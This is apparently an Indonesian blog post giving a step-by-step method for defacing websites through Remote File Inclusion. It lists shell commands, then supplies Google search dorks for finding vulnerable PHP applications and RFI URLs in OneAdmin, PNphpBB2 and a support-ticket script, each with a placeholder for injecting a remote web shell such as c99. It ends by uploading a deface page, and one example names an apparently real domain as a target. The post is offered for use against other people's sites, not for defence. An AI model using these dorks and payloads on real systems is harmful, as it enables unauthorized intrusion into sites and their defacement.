WHAT'S NEW?
Loading...

Deface Web simple Via RFI

Cara Mudah Deface Remote File Include, Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita.
  • cd namadirectory = Melihat Suatu directory
  • ls -al = Melihat Suatu Directory Lebih Dalam lagi
  • find = Mengecek Directory directory
  • cat = Membaca Suatu Berkas
  • wget = MengUpload suatu Files
  • tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
  • pwd = Mengetahui Di Directory mana Kita Berada
  • uname -a = Keberadaan Path berada
  • w = Mengetahui Siapa Saja yang telah menggunakan Shell.
  • curl = mendownload url
  • [EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
- Site Oneadmin RFI
atau cari RFI di exploit db atau web penyedia exploit lain. Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com, lalu sekarang saya kasi contoh pathnya :
http://target.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki.
nah sekarang saya kasi contoh pathnya:
http://target.com/modules/PNphpBB2/include/functions_admin.php?phpbb_root_path=[EvilShellInject]
Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka. sekarang saya kasi contoh pathnya
http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : …
http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]
nah sekarang tinggal upload file html/php defacesan kita ke direktoryinya
kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html

0 comments: